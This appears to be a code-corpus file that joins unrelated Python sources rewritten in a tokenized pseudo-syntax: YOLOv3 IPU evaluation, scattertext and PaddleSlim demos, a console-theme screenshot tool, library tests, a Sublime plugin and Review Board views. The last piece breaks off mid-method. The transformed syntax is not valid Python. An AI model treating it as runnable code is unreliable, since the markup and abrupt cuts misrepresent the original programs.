infeed_queue=ipu_infeed_queue.IPUInfeedQueue(ds)<line_sep>outfeed_queue=ipu_outfeed_queue.IPUOutfeedQueue()<def_stmt>model_func input_data nums<block_start>pred_sbbox,pred_mbbox,pred_lbbox,nums=network_func(input_data nums)<line_sep>outfeed=outfeed_queue.enqueue({"pred_sbbox":pred_sbbox "pred_mbbox":pred_mbbox "pred_lbbox":pred_lbbox "nums":nums})<line_sep><return>outfeed<block_end><def_stmt>my_net <block_start>r=loops.repeat(self.repeat_count model_func [] infeed_queue)<line_sep><return>r<block_end><with_stmt>ipu.scopes.ipu_scope("/device:IPU:0")<block_start>self.run_loop=ipu.ipu_compiler.compile(my_net inputs=[])<block_end># The outfeed dequeue has to happen after the outfeed enqueue self.dequeue_outfeed=outfeed_queue.dequeue()<line_sep>self.sess=tf.Session(config=tf.ConfigProto())<line_sep>self.sess.run(infeed_queue.initializer)<block_end><else_stmt># if using feed dict, it will be simpler # the cost is throughput <block_start><with_stmt>tf.device("cpu")<block_start><with_stmt>tf.name_scope("input")# three channel images <block_start>self.input_data=tf.placeholder(shape=input_shape dtype=self.precision name="input_data")<line_sep>self.nums=tf.placeholder(shape=(self.batch_size) dtype=tf.int32 name="nums")<block_end><block_end><with_stmt>ipu.scopes.ipu_scope("/device:IPU:0")<block_start>self.output=ipu.ipu_compiler.compile(network_func [self.input_data self.nums])<block_end>self.sess=tf.Session(config=tf.ConfigProto())<block_end><if_stmt>self.use_moving_avg<block_start><with_stmt>tf.name_scope("ema")<block_start>ema_obj=tf.train.ExponentialMovingAverage(self.moving_avg_decay)<block_end>self.saver=tf.train.Saver(ema_obj.variables_to_restore())<block_end><else_stmt><block_start>self.saver=tf.train.Saver()<block_end>self.saver.restore(self.sess self.weight_file)<block_end><def_stmt>load_data self<block_start><with_stmt>open(self.annotation_path "r")<as>annotation_file# load_all images <block_start>lines=[]<for_stmt>line annotation_file<block_start>lines.append(line)<block_end><block_end>image_dict=self.testset.load_images(dump=<false>)<line_sep><return>lines image_dict<block_end><def_stmt>data_generator self<block_start>"""Generate input image and write groundtruth info """<if_stmt>os.path.exists(self.write_image_path)<block_start>shutil.rmtree(self.write_image_path)<block_end>os.mkdir(self.write_image_path)<line_sep>self.ground_truth_file=open(self.ground_truth_file_path "w")<line_sep>image_datas=[]<line_sep>nums=[]<for_stmt>num,line enumerate(self.lines)<block_start>annotation=line.strip().split()<line_sep>image_path=annotation[0]<line_sep>image_name=image_path.split("/")[-1]<line_sep>image=self.image_dict[line.strip()]<line_sep>bbox_data_gt=np.array([list(map(int box.split(",")))<for>box annotation[1:]])<if_stmt>len(bbox_data_gt)<eq>0<block_start>bboxes_gt=[]<line_sep>classes_gt=[]<block_end><else_stmt><block_start>bboxes_gt,classes_gt=bbox_data_gt[: :4] bbox_data_gt[: 4]<block_end>num_bbox_gt=len(bboxes_gt)<line_sep># output ground-truth self.ground_truth_file.write(str(num)+":\n")<for_stmt>i range(num_bbox_gt)<block_start>class_name=self.classes[classes_gt[i]]<line_sep>xmin,ymin,xmax,ymax=list(map(str bboxes_gt[i]))<line_sep>bbox_mess=",".join([class_name xmin ymin xmax ymax])+"\n"<line_sep>self.ground_truth_file.write(bbox_mess)<block_end>image_copy=np.copy(image)<line_sep>org_h,org_w,_=image.shape<line_sep>image_data=utils.resize_image(image_copy [self.input_size self.input_size])<line_sep># we don't want to pass metadata through pipeline # so we'll keep it with a dictionary 
self.meta_dict[num]=[org_h org_w image_name line]<line_sep>image_datas.append(image_data)<line_sep>nums.append(num)<if_stmt>len(nums)<l>self.batch_size<block_start><if_stmt>num<l>len(self.lines)-1<block_start><continue><block_end><else_stmt># if there's not enough data to fill the last batch # we repeat the last image to yield a full sized batch <block_start><for_stmt>_ range(len(image_datas) self.batch_size)<block_start>image_datas.append(image_datas[-1])<line_sep>nums.append(nums[-1])<block_end><block_end><block_end>image_datas=np.array(image_datas).astype(np.float16)<line_sep><yield>(image_datas nums)<if_stmt>num<l>len(self.lines)-1<block_start>image_datas=[]<line_sep>nums=[]<block_end><block_end><while_stmt><true># if using infeed_queue. it will need more batches # to padd the data and meet the required repeat_count # so we will use last batch for padding <block_start><yield>(image_datas nums)<block_end><block_end><def_stmt>parse_result self pred_sbbox_list pred_mbbox_list pred_lbbox_list nums<block_start>"""Parse and write predicted result """<for_stmt>i range(len(nums))# if nums value is repeated # that means nums[i] is a repeated value for matching required batch size # so we can stop the iteration <block_start><if_stmt>i<g>0<and>nums[i]<le>nums[i-1]<block_start><break><block_end>num=nums[i]<line_sep>pred_sbbox=pred_sbbox_list[i]<line_sep>pred_mbbox=pred_mbbox_list[i]<line_sep>pred_lbbox=pred_lbbox_list[i]<line_sep>org_h,org_w,image_name,line=self.meta_dict[num]<line_sep>image_path=line.strip().split()[0]<line_sep>image=self.image_dict[line.strip()]<line_sep>pred_bbox=np.concatenate([np.reshape(pred_sbbox (-1 5+self.num_classes)) np.reshape(pred_mbbox (-1 5+self.num_classes)) np.reshape(pred_lbbox (-1 5+self.num_classes))] axis=0)<line_sep># convert boxes from input_image coordinate to original image coordinate bboxes=utils.postprocess_boxes(pred_bbox (org_h org_w) self.input_size self.score_threshold)<line_sep>bboxes_pr=utils.nms(bboxes self.iou_threshold)<if_stmt>self.write_image<block_start>image=utils.draw_bbox(image bboxes_pr self.classes show_label=self.show_label)<line_sep>cv2.imwrite(self.write_image_path+image_name image)<block_end>self.predict_result_file.write(str(num)+":\n")<for_stmt>bbox bboxes_pr<block_start>coor=np.array(bbox[:4] dtype=np.int32)<line_sep>score=bbox[4]<line_sep>class_ind=int(bbox[5])<line_sep>class_name=self.classes[class_ind]<line_sep>score="%.4f"%score<line_sep>xmin,ymin,xmax,ymax=list(map(str coor))<line_sep>bbox_mess=",".join([class_name score xmin ymin xmax ymax])+"\n"<line_sep>self.predict_result_file.write(bbox_mess)<block_end><block_end><block_end><def_stmt>evaluate self<block_start>self.predict_result_file=open(self.predicted_file_path "w")<if_stmt>self.use_infeed_queue# using infeed queue to improve throughput # we can use an additional thread to run dequeue_outfeed for decrease latency and further improve throughput <block_start>total_samples=len(self.lines)<line_sep>interaction_samples=self.batch_size<times>self.repeat_count<line_sep>total_interactions=total_samples/interaction_samples<line_sep>total_interactions=math.ceil(total_interactions)<for_stmt>interaction_index range(total_interactions)<block_start>run_start=time.time()<line_sep>self.sess.run(self.run_loop)<line_sep>result=self.sess.run(self.dequeue_outfeed)<line_sep>run_duration=time.time()-run_start<line_sep>pred_sbbox_list,pred_mbbox_list,pred_lbbox_list,nums=result["pred_sbbox"] result["pred_mbbox"] result["pred_lbbox"] result["nums"]<for_stmt>i range(len(nums))# len(nums) == 
repeat_count # there's repeat count number of batches for each run <block_start><if_stmt>i<g>0<and>nums[i][0]<le>nums[i-1][0]# ignore repeated data # these are only for meeting data size required when using ipu.loops.repeat <block_start><break><block_end>self.parse_result(pred_sbbox_list[i] pred_mbbox_list[i] pred_lbbox_list[i] nums[i])<block_end>logger.info("progress:{}/{} ,latency: {}, through put: {}, batch size: {}, repeat count: {}".format((interaction_index+1)<times>interaction_samples len(self.lines) run_duration interaction_samples/run_duration self.batch_size self.repeat_count))<block_end><block_end><else_stmt># if not use infeed_queue, it will return for every batch <block_start>data_gen=self.data_generator()<line_sep>interaction_samples=self.batch_size<line_sep>total_interactions=math.ceil(len(self.lines)/interaction_samples)<for_stmt>interaction_index range(total_interactions)<block_start>image_datas,nums=next(data_gen)<line_sep>run_start=time.time()<line_sep>pred_sbbox_list,pred_mbbox_list,pred_lbbox_list,nums=self.sess.run(self.output feed_dict={self.input_data:image_datas self.nums:nums})<line_sep>run_duration=time.time()-run_start<line_sep>self.parse_result(pred_sbbox_list pred_mbbox_list pred_lbbox_list nums)<line_sep>logger.info("progress:{}/{} ,latency: {}, through put: {}, batch size: {}".format((interaction_index+1)<times>interaction_samples len(self.lines) run_duration interaction_samples/run_duration self.batch_size))<block_end><block_end>self.ground_truth_file.close()<line_sep>self.predict_result_file.close()<line_sep>self.sess.close()<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>parser=argparse.ArgumentParser(description="evaluation in TensorFlow" add_help=<false>)<line_sep>parser.add_argument("--config" type=str default="config/config_800.json" help="json config file for yolov3.")<line_sep>parser.add_argument("--test_path" type=str default="./data/dataset/voc_test.txt" help="data path for test")<line_sep>arguments=parser.parse_args()<with_stmt>open(arguments.config)<as>f<block_start>opts=json.load(f)<block_end>opts['test']['annot_path']=arguments.test_path<line_sep>YoloTest(opts).evaluate()<block_end>
# https://leetcode.com/problems/generate-a-string-with-characters-that-have-odd-counts <def_stmt>generate_the_string n<block_start><if_stmt>n%2<eq>0<block_start><return>'a'<times>(n-1)+'b'<block_end><return>'a'<times>n<block_end>
<import_from_stmt>.repository SQLAlchemyMetaRepository<line_sep>__all__=['SQLAlchemyMetaRepository']<line_sep>
<import_stmt>scattertext<as>st<import_from_stmt>scattertext RankDifference<line_sep>convention_df=st.SampleCorpora.ConventionData2012.get_data()<line_sep>convention_df['parse']=convention_df['text'].apply(st.whitespace_nlp_with_sentences)<line_sep>unigram_corpus=(st.CorpusFromParsedDocuments(convention_df category_col='party' parsed_col='parse').build().get_stoplisted_unigram_corpus())<line_sep>topic_model=(st.SentencesForTopicModeling(unigram_corpus).get_topics_from_terms(['obama' 'romney' 'democrats' 'republicans' 'health' 'military' 'taxes' 'education' 'olympics' 'auto' 'iraq' 'iran' 'israel'] scorer=RankDifference() num_terms_per_topic=20))<line_sep>topic_feature_builder=st.FeatsFromTopicModel(topic_model)<line_sep>topic_corpus=st.CorpusFromParsedDocuments(convention_df category_col='party' parsed_col='parse' feats_from_spacy_doc=topic_feature_builder).build()<line_sep>html=st.produce_scattertext_explorer(topic_corpus category='democrat' category_name='Democratic' not_category_name='Republican' width_in_pixels=1000 metadata=convention_df['speaker'] use_non_text_features=<true> use_full_doc=<true> pmi_threshold_coefficient=0 topic_model_term_lists=topic_feature_builder.get_top_model_term_lists())<line_sep>open('./demo_word_list_topic_model.html' 'wb').write(html.encode('utf-8'))<line_sep>print('Open ./demo_word_list_topic_model.html in Chrome or Firefox.')<line_sep>
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_from_future_stmt> print_function<import_stmt>argparse<import_stmt>ast<import_stmt>numpy<as>np<import_from_stmt>PIL Image<import_stmt>os<import_stmt>paddle<import_stmt>paddle.fluid<as>fluid<import_from_stmt>paddle.fluid.optimizer AdamOptimizer<import_from_stmt>paddle.fluid.dygraph.nn Conv2D Pool2D Linear<import_from_stmt>paddle.fluid.dygraph.base to_variable<import_from_stmt>paddleslim.nas.one_shot SuperMnasnet<import_from_stmt>paddleslim.nas.one_shot OneShotSearch<def_stmt>parse_args <block_start>parser=argparse.ArgumentParser("Training for Mnist.")<line_sep>parser.add_argument("--use_data_parallel" type=ast.literal_eval default=<false> help="The flag indicating whether to use data parallel mode to train the model.")<line_sep>parser.add_argument("-e" "--epoch" default=5 type=int help="set epoch")<line_sep>parser.add_argument("--ce" action="store_true" help="run ce")<line_sep>args=parser.parse_args()<line_sep><return>args<block_end><class_stmt>SimpleImgConv(fluid.dygraph.Layer)<block_start><def_stmt>__init__ self num_channels num_filters filter_size conv_stride=1 conv_padding=0 conv_dilation=1 conv_groups=1 act=<none> use_cudnn=<false> param_attr=<none> bias_attr=<none><block_start>super(SimpleImgConv self).__init__()<line_sep>self._conv2d=Conv2D(num_channels=num_channels num_filters=num_filters filter_size=filter_size stride=conv_stride padding=conv_padding dilation=conv_dilation groups=conv_groups param_attr=<none> bias_attr=<none> act=act use_cudnn=use_cudnn)<block_end><def_stmt>forward self inputs<block_start>x=self._conv2d(inputs)<line_sep><return>x<block_end><block_end><class_stmt>MNIST(fluid.dygraph.Layer)<block_start><def_stmt>__init__ self<block_start>super(MNIST self).__init__()<line_sep>self._simple_img_conv_pool_1=SimpleImgConv(1 20 2 act="relu")<line_sep>self.arch=SuperMnasnet(name_scope="super_net" input_channels=20 out_channels=20)<line_sep>self._simple_img_conv_pool_2=SimpleImgConv(20 50 2 act="relu")<line_sep>self.pool_2_shape=50<times>13<times>13<line_sep>SIZE=10<line_sep>scale=(2.0/(self.pool_2_shape<power>2<times>SIZE))<power>0.5<line_sep>self._fc=Linear(self.pool_2_shape 10 param_attr=fluid.param_attr.ParamAttr(initializer=fluid.initializer.NormalInitializer(loc=0.0 scale=scale)) act="softmax")<block_end><def_stmt>forward self inputs label=<none> tokens=<none><block_start>x=self._simple_img_conv_pool_1(inputs)<line_sep>x=self.arch(x tokens=tokens)# addddddd x=self._simple_img_conv_pool_2(x)<line_sep>x=fluid.layers.reshape(x shape=[-1 self.pool_2_shape])<line_sep>x=self._fc(x)<if_stmt>label<is><not><none><block_start>acc=fluid.layers.accuracy(input=x label=label)<line_sep><return>x acc<block_end><else_stmt><block_start><return>x<block_end><block_end><block_end><def_stmt>test_mnist model tokens=<none><block_start>acc_set=[]<line_sep>avg_loss_set=[]<line_sep>batch_size=64<line_sep>test_reader=paddle.fluid.io.batch(paddle.dataset.mnist.test() batch_size=batch_size 
drop_last=<true>)<for_stmt>batch_id,data enumerate(test_reader())<block_start>dy_x_data=np.array([x[0].reshape(1 28 28)<for>x data]).astype('float32')<line_sep>y_data=np.array([x[1]<for>x data]).astype('int64').reshape(batch_size 1)<line_sep>img=to_variable(dy_x_data)<line_sep>label=to_variable(y_data)<line_sep>label.stop_gradient=<true><line_sep>prediction,acc=model.forward(img label tokens=tokens)<line_sep>loss=fluid.layers.cross_entropy(input=prediction label=label)<line_sep>avg_loss=fluid.layers.mean(loss)<line_sep>acc_set.append(float(acc.numpy()))<line_sep>avg_loss_set.append(float(avg_loss.numpy()))<if_stmt>batch_id%100<eq>0<block_start>print("Test - batch_id: {}".format(batch_id))<block_end># get test acc and loss <block_end>acc_val_mean=np.array(acc_set).mean()<line_sep>avg_loss_val_mean=np.array(avg_loss_set).mean()<line_sep><return>acc_val_mean<block_end><def_stmt>train_mnist args model tokens=<none><block_start>epoch_num=args.epoch<line_sep>BATCH_SIZE=64<line_sep>adam=AdamOptimizer(learning_rate=0.001 parameter_list=model.parameters())<line_sep>train_reader=paddle.fluid.io.batch(paddle.dataset.mnist.train() batch_size=BATCH_SIZE drop_last=<true>)<if_stmt>args.use_data_parallel<block_start>train_reader=fluid.contrib.reader.distributed_batch_reader(train_reader)<block_end><for_stmt>epoch range(epoch_num)<block_start><for_stmt>batch_id,data enumerate(train_reader())<block_start>dy_x_data=np.array([x[0].reshape(1 28 28)<for>x data]).astype('float32')<line_sep>y_data=np.array([x[1]<for>x data]).astype('int64').reshape(-1 1)<line_sep>img=to_variable(dy_x_data)<line_sep>label=to_variable(y_data)<line_sep>label.stop_gradient=<true><line_sep>cost,acc=model.forward(img label tokens=tokens)<line_sep>loss=fluid.layers.cross_entropy(cost label)<line_sep>avg_loss=fluid.layers.mean(loss)<if_stmt>args.use_data_parallel<block_start>avg_loss=model.scale_loss(avg_loss)<line_sep>avg_loss.backward()<line_sep>model.apply_collective_grads()<block_end><else_stmt><block_start>avg_loss.backward()<block_end>adam.minimize(avg_loss)<line_sep># save checkpoint model.clear_gradients()<if_stmt>batch_id%1<eq>0<block_start>print("Loss at epoch {} step {}: {:}".format(epoch batch_id avg_loss.numpy()))<block_end><block_end>model.eval()<line_sep>test_acc=test_mnist(model tokens=tokens)<line_sep>model.train()<line_sep>print("Loss at epoch {} , acc is: {}".format(epoch test_acc))<block_end>save_parameters=(<not>args.use_data_parallel)<or>(args.use_data_parallel<and>fluid.dygraph.parallel.Env().local_rank<eq>0)<if_stmt>save_parameters<block_start>fluid.save_dygraph(model.state_dict() "save_temp")<line_sep>print("checkpoint saved")<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>args=parse_args()<line_sep>place=fluid.CPUPlace()<with_stmt>fluid.dygraph.guard(place)<block_start>model=MNIST()<line_sep># step 1: training super net #train_mnist(args, model) # step 2: search best_tokens=OneShotSearch(model test_mnist)<block_end># step 3: final training # train_mnist(args, model, best_tokens) <block_end>
""" cpsg.py ~~~~~~ Concfg Preset Screenshot Generator Only works in pure powershell/pwsh session, does not work in terminal like cmder. Prerequisites: Python3.4+, Pillow, jinja2, pywin32 """<import_stmt>os<import_stmt>sys<import_stmt>glob<import_stmt>time<import_stmt>shutil<import_stmt>argparse<import_stmt>win32gui<import_stmt>subprocess<import_stmt>win32process<import_from_stmt>PIL ImageGrab<import_from_stmt>jinja2 Template<line_sep>LEGACY_PWSH=<false><line_sep>SCRIPT_DIR=os.path.dirname(os.path.realpath(__file__))<line_sep>PRESETS_DIR=os.path.join(SCRIPT_DIR os.pardir 'presets')<line_sep>PRESET_EXAMPLES_DIR=os.path.join(SCRIPT_DIR os.pardir 'preset_examples')<line_sep>SKIP_LIST=['basic' 'basic-reset']<def_stmt>get_hwnds_for_pid pid<block_start><def_stmt>callback hwnd hwnds<block_start><if_stmt>win32gui.IsWindowVisible(hwnd)<and>win32gui.IsWindowEnabled(hwnd)<block_start>_,found_pid=win32process.GetWindowThreadProcessId(hwnd)<if_stmt>found_pid<eq>pid<block_start>hwnds.append(hwnd)<block_end><return><true><block_end><block_end>hwnds=[]<line_sep>win32gui.EnumWindows(callback hwnds)<line_sep><return>hwnds<block_end><def_stmt>get_presets <block_start>files=glob.glob(os.path.join(PRESETS_DIR '*.json'))<line_sep>presets=[]<for_stmt>item files<block_start>presets.append((os.path.splitext(os.path.basename(item))[0] item))<block_end># preset pair list [(name, path), (name, path), ...] <return>presets<block_end><def_stmt>gens_for_preset preset<block_start>exe='powershell'<if>LEGACY_PWSH<else>'pwsh'<line_sep>print("Taking screenshot of preset '{0}'...".format(preset[0]))<line_sep># set color preset pwsh=subprocess.Popen('{0} -noprofile -file {1}/setcolors.ps1 -preset {2}'.format(exe SCRIPT_DIR preset[1]) creationflags=subprocess.CREATE_NEW_CONSOLE)<line_sep># waiting for exit time.sleep(4.0)<line_sep># print out color table then take screenshot pwsh=subprocess.Popen('{0} -noprofile -noexit -file {1}/outcolors.ps1'.format(exe SCRIPT_DIR) creationflags=subprocess.CREATE_NEW_CONSOLE)<line_sep># waiting for process time.sleep(2.0)<for_stmt>hwnd get_hwnds_for_pid(pwsh.pid)<block_start>win32gui.SetForegroundWindow(hwnd)<block_end>bbox=win32gui.GetWindowRect(hwnd)<line_sep># remove window box shadow crop_bbox=(bbox[0]+7 bbox[1] bbox[2]-7 bbox[3]-7)<line_sep>img=ImageGrab.grab(crop_bbox)<if_stmt><not>os.path.exists(PRESET_EXAMPLES_DIR)<block_start>os.makedirs(PRESET_EXAMPLES_DIR)<block_end>img.save(os.path.join(PRESET_EXAMPLES_DIR '{0}.png'.format(preset[0])))<line_sep>pwsh.kill()<block_end><def_stmt>img_dict direntry<block_start><return>{'name':direntry.name.replace('.png' '') 'path':direntry.name}<block_end><def_stmt>is_img direntry<block_start><if_stmt>direntry.is_file<and>direntry.name.endswith('.png')<block_start><return><true><block_end><return><false><block_end><if_stmt>__name__<eq>'__main__'# Usage: python -m cpsg [args] <block_start>parser=argparse.ArgumentParser(description='Concfg Preset Screenshot Generator')<line_sep>parser.add_argument("-a" "--all" help="generate screenshot for all presets" action="store_true")<line_sep>parser.add_argument("-l" "--legacy" help="pass this option if you use Windows PowerShell" action="store_true")<line_sep>parser.add_argument("-p" "--preset" help="generate screenshot for single preset")<line_sep>parser.add_argument("-u" "--update" help="also update the screenshot README" action="store_true")<line_sep>args=parser.parse_args()<if_stmt>args.all<or>args.preset<block_start><if_stmt><not>shutil.which('colortool.exe')<block_start>print("Make sure you have 'ColorTool' 
installed.")<line_sep>sys.exit(0)<block_end>input("NOTICE: Do not have other operations while the script runs, "<concat>"or it will be interrupted when taking screenshots. "<concat>"Hit Enter to continue: ")<line_sep>presets=get_presets()<if_stmt>args.legacy<block_start>LEGACY_PWSH=<true><block_end><if_stmt>args.all<block_start><for_stmt>item presets# skip non-color presets <block_start><if_stmt><not>item[0]<in>SKIP_LIST<block_start>gens_for_preset(item)<block_end><block_end><block_end><elif_stmt>args.preset# skip non-color presets <block_start><if_stmt><not>args.preset<in>SKIP_LIST<block_start>match=[item<for>item presets<if>item[0]<eq>args.preset]<if_stmt>len(match)<block_start>gens_for_preset(match[0])<block_end><else_stmt><block_start>print("No preset named '{0}'.".format(args.preset))<line_sep>sys.exit(0)<block_end><block_end><block_end><if_stmt>args.update<block_start>print('Updating screenshots README.md...')<line_sep># Get template <with_stmt>open(os.path.join(SCRIPT_DIR 'readme.jinja2'))<as>templateData<block_start>template=Template(templateData.read())<block_end># Get images images=[img_dict(direntry)<for>direntry os.scandir(PRESET_EXAMPLES_DIR)<if>is_img(direntry)]<line_sep>images.sort(key=<lambda>x:x['name'])<line_sep># Generate README <with_stmt>open(os.path.join(PRESET_EXAMPLES_DIR 'README.md') 'w')<as>readme<block_start>readme.write(template.render(images=images))<block_end><block_end><block_end><else_stmt><block_start>parser.print_help()<line_sep>sys.exit(0)<block_end><block_end>
<import_stmt>os<import_stmt>shutil<import_stmt>unittest<import_from_stmt>tests.abstract_resolver AbstractResolverTest<import_from_stmt>loris resolver<class_stmt>SourceImageCachingResolverTest(AbstractResolverTest unittest.TestCase)<block_start><def_stmt>setUp self<block_start>super(SourceImageCachingResolverTest self).setUp()<line_sep>tests_dir=os.path.dirname(os.path.realpath(__file__))<line_sep>self.cache_dir=os.path.join(tests_dir 'cache')<line_sep>config={'source_root':os.path.join(tests_dir 'img') 'cache_root':self.cache_dir}<line_sep>self.identifier='01/02/0001.jp2'<line_sep>self.expected_filepath=os.path.join(self.cache_dir self.identifier)<line_sep>self.not_identifier='DOES_NOT_EXIST.jp2'<line_sep>self.expected_format='jp2'<line_sep>self.resolver=resolver.SourceImageCachingResolver(config)<block_end><def_stmt>test_resolve self<block_start>super(SourceImageCachingResolverTest self).test_resolve()<line_sep># Make sure the file exists in the cache self.assertTrue(os.path.isfile(self.expected_filepath))<block_end><def_stmt>tearDown self# Clean Up the cache directory <block_start><if_stmt>os.path.exists(self.cache_dir)<block_start>shutil.rmtree(self.cache_dir)<block_end><block_end><block_end>
# # Copyright (C) 2021 <NAME> <<EMAIL>> # License: MIT # # pylint: disable=missing-docstring <import_stmt>unittest<import_stmt>anyconfig.api<import_from_stmt>. common<line_sep>LOADER_TYPES=frozenset(anyconfig.api.list_types())<line_sep>@unittest.skipIf('yaml'<not><in>LOADER_TYPES 'yaml loader is not available')<class_stmt>YamlTestCase(common.TestCase)<block_start>kind='yaml'<line_sep>pattern='*.yml'<block_end>@unittest.skipIf('toml'<not><in>LOADER_TYPES 'toml loader is not available')<class_stmt>TomlTestCase(YamlTestCase)<block_start>kind='toml'<line_sep>pattern='*.toml'<block_end># vim:sw=4:ts=4:et:
<import_stmt>sys<import_stmt>os<try_stmt><block_start><import_stmt>sublime<block_end><except_stmt>Exception<block_start><pass><block_end>NEW_ACCOUNT_TXT='''Welcome {username}!\n\nYou're all set to collaborate. You should check out our docs at https://{host}/help/plugins/sublime#usage. You must run 'Floobits - Complete Sign Up' so you can log in to the website.'''<line_sep>LINKED_ACCOUNT_TXT='''Welcome {username}!\n\nYou are all set to collaborate. You may want to check out our docs at https://{host}/help/plugins/sublime#usage'''<def_stmt>name <block_start><if_stmt>sys.version_info<l>(3 0)<block_start>py_version=2<block_end><else_stmt><block_start>py_version=3<block_end><return>'Sublime Text %s'%py_version<block_end><def_stmt>codename <block_start><return>'sublime'<block_end><def_stmt>ok_cancel_dialog dialog<block_start><return>sublime.ok_cancel_dialog(dialog)<block_end><def_stmt>error_message msg<block_start>sublime.error_message(msg)<block_end><def_stmt>status_message msg<block_start>sublime.status_message(msg)<block_end><def_stmt>platform <block_start><return>sublime.platform()<block_end><def_stmt>set_timeout f timeout<block_start>sublime.set_timeout(f timeout)<block_end><def_stmt>call_timeouts <block_start><return><block_end><def_stmt>message_dialog msg<block_start>sublime.message_dialog(msg)<block_end><def_stmt>open_file file<block_start>win=sublime.active_window()<if_stmt>win<block_start>win.open_file(file)<block_end><block_end><def_stmt>get_line_endings path=<none><block_start>ending=sublime.load_settings('Preferences.sublime-settings').get('default_line_ending')<if_stmt>ending<eq>'system'<block_start><return>os.linesep<block_end><if_stmt>ending<eq>'windows'<block_start><return>'\r\n'<block_end><return>'\n'<block_end><def_stmt>select_auth *args<block_start>window,auths,cb=args<if_stmt><not>auths<block_start><return>cb(<none>)<block_end>auths=dict(auths)<for_stmt>k,v auths.items()<block_start>v['host']=k<block_end><if_stmt>len(auths)<eq>1<block_start><return>cb(list(auths.values())[0])<block_end>opts=[[h 'Connect as %s'%a.get('username')]<for>h,a auths.items()]<line_sep>opts.append(['Cancel' ''])<def_stmt>on_account index<block_start><if_stmt>index<l>0<or>index<ge>len(auths)# len(hosts) is cancel, appended to opts at end below <block_start><return>cb(<none>)<block_end>host=opts[index][0]<line_sep><return>cb(auths[host])<block_end>flags=0<if_stmt>hasattr(sublime 'KEEP_OPEN_ON_FOCUS_LOST')<block_start>flags<augor>sublime.KEEP_OPEN_ON_FOCUS_LOST<block_end><return>window.show_quick_panel(opts on_account flags)<block_end>
<import_from_future_stmt> unicode_literals<import_stmt>logging<import_from_stmt>django.conf settings<import_from_stmt>django.contrib.auth.decorators login_required<import_from_stmt>django.contrib.auth.models User<import_from_stmt>django.core.urlresolvers reverse<import_from_stmt>django.forms.forms ErrorDict<import_from_stmt>django.http HttpResponseRedirect<import_from_stmt>django.shortcuts get_object_or_404<import_from_stmt>django.utils six<import_from_stmt>django.utils.decorators method_decorator<import_from_stmt>django.utils.functional cached_property<import_from_stmt>django.utils.safestring mark_safe<import_from_stmt>django.utils.translation ugettext_lazy<as>_<import_from_stmt>django.views.decorators.csrf csrf_protect<import_from_stmt>django.views.generic.base TemplateView<import_from_stmt>djblets.auth.views register<import_from_stmt>djblets.configforms.views ConfigPagesView<import_from_stmt>djblets.features.decorators feature_required<import_from_stmt>djblets.forms.fieldsets filter_fieldsets<import_from_stmt>djblets.siteconfig.models SiteConfiguration<import_from_stmt>djblets.util.compat.django.shortcuts render<import_from_stmt>djblets.util.decorators augment_method_from<import_from_stmt>djblets.views.generic.etag ETagViewMixin<import_from_stmt>reviewboard.accounts.backends get_enabled_auth_backends<import_from_stmt>reviewboard.accounts.forms.registration RegistrationForm<import_from_stmt>reviewboard.accounts.mixins CheckLoginRequiredViewMixin<import_from_stmt>reviewboard.accounts.models Profile<import_from_stmt>reviewboard.accounts.pages AccountPage OAuth2Page PrivacyPage<import_from_stmt>reviewboard.accounts.privacy is_consent_missing<import_from_stmt>reviewboard.admin.decorators check_read_only<import_from_stmt>reviewboard.avatars avatar_services<import_from_stmt>reviewboard.notifications.email.decorators preview_email<import_from_stmt>reviewboard.notifications.email.message prepare_password_changed_mail<import_from_stmt>reviewboard.oauth.features oauth2_service_feature<import_from_stmt>reviewboard.oauth.forms UserApplicationChangeForm UserApplicationCreationForm <import_from_stmt>reviewboard.oauth.models Application<import_from_stmt>reviewboard.site.mixins CheckLocalSiteAccessViewMixin<import_from_stmt>reviewboard.site.urlresolvers local_site_reverse<class_stmt>UserInfoboxView(CheckLoginRequiredViewMixin CheckLocalSiteAccessViewMixin ETagViewMixin TemplateView)<block_start>"""Displays information on a user, for use in user pop-up infoboxes. This is meant to be embedded in other pages, rather than being a standalone page. """<line_sep>template_name='accounts/user_infobox.html'<def_stmt>__init__ self **kwargs<block_start>"""Initialize a view for the request. Args: **kwargs (dict): Keyword arguments passed to :py:meth:`as_view`. """<line_sep>super(UserInfoboxView self).__init__(**kwargs)<line_sep>self._lookup_user=<none><line_sep>self._show_profile=<none><line_sep>self._timezone=<none><block_end><def_stmt>get_etag_data self request username *args **kwargs<block_start>"""Return an ETag for the view. This will look up some state needed for the request and generate a suitable ETag. Args: request (django.http.HttpRequest): The HTTP request from the client. username (unicode): The username of the user being looked up. *args (tuple): Positional arguments to pass to the handler. **kwargs (tuple): Keyword arguments to pass to the handler. These will be arguments provided by the URL pattern. Returns: unicode: The ETag for the page. 
"""<import_from_stmt>reviewboard.extensions.hooks UserInfoboxHook<line_sep>user=get_object_or_404(User username=username)<line_sep>self._lookup_user=user<line_sep>profile=user.get_profile()<line_sep>self._show_profile=user.is_profile_visible(request.user)<line_sep>self._timezone=profile.timezone<line_sep>etag_data=[user.first_name user.last_name user.email six.text_type(user.last_login) six.text_type(settings.TEMPLATE_SERIAL) six.text_type(self._show_profile) self._timezone ]<if_stmt>avatar_services.avatars_enabled<block_start>avatar_service=avatar_services.for_user(user)<if_stmt>avatar_service<block_start>etag_data.extend(avatar_service.get_etag_data(user))<block_end><block_end>local_site=self.local_site<for_stmt>hook UserInfoboxHook.hooks<block_start><try_stmt><block_start>etag_data.append(hook.get_etag_data(user=user request=request local_site=local_site))<block_end><except_stmt>Exception<as>e<block_start>logging.exception('Error when running UserInfoboxHook.'<concat>'get_etag_data method in extension "%s": %s' hook.extension.id e)<block_end><block_end><return>':'.join(etag_data)<block_end><def_stmt>get_context_data self **kwargs<block_start>"""Return data for the template. This will return information on the user, along with information from any extension hooks used for the page. Args: **kwargs (tuple): Additional keyword arguments from the URL pattern. Returns: dict: Context data for the template. """<import_from_stmt>reviewboard.extensions.hooks UserInfoboxHook<line_sep># These are accessed several times, so bring them in to reduce # attribute lookups. user=self._lookup_user<line_sep>username=user.username<line_sep>local_site=self.local_site<line_sep>extra_content=[]<for_stmt>hook 